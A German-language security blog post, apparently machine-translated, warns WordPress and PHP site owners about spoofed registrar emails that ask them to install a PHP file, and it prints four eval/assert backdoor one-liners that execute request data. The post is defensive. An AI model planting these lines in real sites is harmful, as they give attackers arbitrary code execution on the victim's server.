Security Blog
Security Blog

Sie nicht, diese gefälschte Domain Bestätigung E-Mails vertrauen

Wenn Sie jemals einen Brief erhalten, der bittet, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie ihn ignorieren


English version: Do not trust those fake domain confirmation emails


Kürzlich haben einige meiner Kunden von ihren Domain-Registraren seltsame E-Mail-Briefe erhalten. Diese Briefe enthalten eine eigene Anfrage nach Bestätigungsdomänen. Ich überprüfte einen dieser Briefe und identifizierte ihn schnell als betrügerischen Brief . Alle Buchstaben haben ein identisches Muster und die Anforderung, im Stammordner einer Website eine PHP-Datei mit einem bestimmten Namen und dem angegebenen Inhalt zu erstellen. Es ist unnötig zu erwähnen, dass der vorgeschlagene Inhalt für diese PHP-Datei schädlichen Code enthält, der als Backdoor-Code bezeichnet wird. Diese Art von Code ermöglicht es dem Angreifer, jede Aktion auszuführen, die er auf der Website eines Opfers wünscht.

Wenn Sie jemals einen Brief erhalten, der bittet, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie ihn ignorieren. Keine Ausnahmen. Auch wenn der Brief vom Präsidenten oder von Ihrer Mutter kommt.

Betrügerische Briefe erscheinen legitim, weil die E-Mail-Adresse legitim ist. Aber es ist ein E-Mail-Spoofing. Sie erwarten nicht, dass Sie von Ihren Freunden oder Ihrem Domain-Registrar eine gefälschte E-Mail erhalten. Recht? Nein! Jeder E-Mail-Brief kann eine beliebige E-Mail-Adresse enthalten. Die überwiegende Mehrheit der E-Mail-Server und E-Mail-Clients überprüft oder überprüft die Absenderadresse nicht. Also siehst du es als Hacker wollte. Sie dürfen keinem E-Mail-Brief vertrauen, den Sie von einem bekannten Absender erhalten haben, wenn der Brief eine Aufforderung zu verdächtigen Aktionen enthält, z.

Technische Details

Gefälschte E-Mails enthalten normalerweise einige der folgenden PHP-Zeilen.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Zu Ihrer Information: base64_decode, eval und assert sind bekannte Marker für verdächtigen oder schädlichen PHP-Code.

Siehe auch: Plugin Inspector deckt Sicherheitsprobleme mit anderen Plugins auf


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.